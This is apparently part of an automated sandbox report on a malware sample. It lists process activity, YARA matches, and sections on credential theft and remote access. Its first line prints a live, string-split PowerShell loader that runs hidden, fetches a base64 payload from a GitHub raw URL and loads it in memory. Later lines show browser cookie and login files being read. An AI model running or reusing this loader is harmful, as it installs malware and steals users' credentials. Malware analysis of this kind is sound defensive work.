Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ((('h'+'rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/no'+'detecto'+'n/nodetecton/refs/heads/main/de'+'tahnoth-'+'v.txth3k; hr'+'fb'+'ase64'+'content ='+' (ne'+'w-object syste'+'m.n'+'et.web'+'client).downloadstr'+'ing'+'(hr'+'furl); hr'+'fbinar'+'yc'+'ontent = [s'+'y'+'stem.conver'+'t]:'+':fromba'+'s'+'e64str'+'ing(h'+'rfb'+'a'+'s'+'e64co'+'ntent'+')'+'; h'+'rfa'+'ss'+'embly = [refle'+'ction'+'.assembly'+']::load(hrfbinarycontent); [d'+'nlib'+'.io.home]::vai('+'cut0/o'+'1fks/d/ee.etsap'+'//:sptth'+'cut, cu'+'td'+'esativadocut,'+' '+'cu'+'tdesativadocut, '+'cutde'+'sativadocut, cutd'+'es'+'at'+'iva'+'do'+'cut,'+' c'+'ut1c'+'ut, cutappidtelcut)') -creplace'cut',[char]34 -replace ([char]104+[char]82+[char]102),[char]36 -replace([char]104+[char]51+[char]107),[char]39))"
Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: mNqSPruzCXM.exe, 00000011.00000000.2644261590.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000011.00000002.3536454733.0000000001810000.00000002.00000001.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3536538308.0000000000C20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\convert.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY